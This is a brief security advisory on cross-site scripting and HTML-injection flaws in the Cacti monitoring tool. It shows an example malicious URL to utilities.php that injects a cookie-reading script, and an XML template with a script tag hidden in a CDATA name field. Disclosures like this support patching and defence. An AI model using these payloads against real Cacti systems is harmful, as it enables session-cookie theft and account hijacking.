Cacti Cross Site Scripting and HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.

The following examples are available:

Cross-site scripting:

http://www.example.com/cacti/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&page=1&action=view_logfile

HTML-injection:

<cacti>
<hash_000016fe5edd777a76d48fc48c11aded5211ef>
<name>
Unix - Load Average<![CDATA[<script>alert(document.cookie)</script>]]>
</name>


 

Privacy Statement
Copyright 2010, SecurityFocus